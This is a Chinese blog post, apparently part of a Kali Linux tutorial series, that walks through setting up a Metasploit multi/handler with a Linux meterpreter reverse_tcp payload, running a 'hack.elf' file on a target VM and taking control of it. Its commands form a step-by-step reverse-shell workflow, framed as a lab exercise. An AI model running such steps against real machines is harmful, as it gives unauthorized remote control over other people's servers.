当前位置:网站首页>网络安全工程师演示:原来***是这样控制你的服务器的!(下)
网络安全工程师演示:原来***是这样控制你的服务器的!(下)
2020-11-10 07:39:00 【osc_a8r2ub9u】
课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Linux的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 启动Metasploit(msf)***测试框架,如下图所示。
命令1:msfconsole
步骤1:利用相应的漏洞利用模块,如下图所示。
命令2:use exploit/multi/handler
步骤2:查看漏洞模块对应的参数,如下图所示。
命令3:show options
步骤3:设置对应的payload方便后续***,如下图所示。
命令:set payload linux/x86/meterpreter/reverse_tcp
步骤4:查看该漏洞模块的相关参数,如下图所示。
命令:show options
步骤5:设置对应的参数,如下图所示。
命令:set lhost 193.168.78.169
步骤6:查看配置的参数是否成功,如下图所示。
命令:show options
3.2 运行***文件,如下图所示。
步骤1:给***文件赋予执行权限,如下图所示。
命令:chmod +x hack.elf
步骤2:执行***文件,如下图所示。
命令:./hack.elf
3.3 运行漏洞利用模块,如下图所示。
命令:run
如下图所示,成功拿下目标主机。
查看目标主机的文件系统信息,如下图所示。
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多******技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧!
版权声明
本文为[osc_a8r2ub9u]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4285472/blog/4710443
边栏推荐
- How much is the cost of CRM system?
- 分布式文档存储数据库之MongoDB索引管理
- 使用call、apply和bind解决js中烦人的this,事件绑定时的this和传参问题
- 实验2
- 假如需要一百万个对象
- YouTube subscription: solve the problem of incomplete height display of YouTube subscription button in pop-up window
- Come and learn! Development Guide for personalized recommendation system (with internet disk link)
- CUDA_常量内存
- What's the difference between delete, truncate, and drop, and what to do if you delete data by mistake
- If you need a million objects
猜你喜欢
【LeetCode】 93 平衡二叉树
JMeter interface test -- a solution with token
What is the SRM system? SRM supplier management system functions
js label语法跳出多重循环
Promote China manufacturing upgrade, 3D visualization of production line in automobile assembly workshop
Hand in hand to teach you to use container service tke cluster audit troubleshooting
Oschina: my green plants are potatoes, ginger and garlic
November 09, 2020: talk about the similarities and differences between the bulon filter and the cuckoo filter?
Baishan cloud technology is selected as the top 100 Internet enterprises in China in 2020
史上最全异常检测算法概述
随机推荐
Difficulties in heterogeneous middleware implementation of Bifrost site management (1)
Detach ()
利用尾巴作为时间序列进行处理来识别鲸鱼
CUDA_全局内存及访问优化
将Map中对应的key和value赋值到对象中
So what should investors do with the current market? Now a new investment outlet is coming!
YouTube subscription: solve the problem of incomplete height display of YouTube subscription button in pop-up window
Python prompt attributeerror or depreciation warning: This module was degraded solution
JS solves the problem of automatic pagination in browser printing
Usage of [:] and [::] in Python
解决Coursera视频无法观看的三种方法(亲测有效)
lodash.js Source code flatten
C++ exception implementation mechanism
编码风格:Mvc模式下SSM环境,代码分层管理
CUDA常用概念及注意点
jmeter接口测试--带有token的解决方法
Simple use of JMeter
The length of the last word in leetcode
Day85: Luffy: shopping cart switching price according to different validity period & shopping cart deletion operation & price settlement & foreplay of order page
[elixir! 0073] beam built-in memory database ETS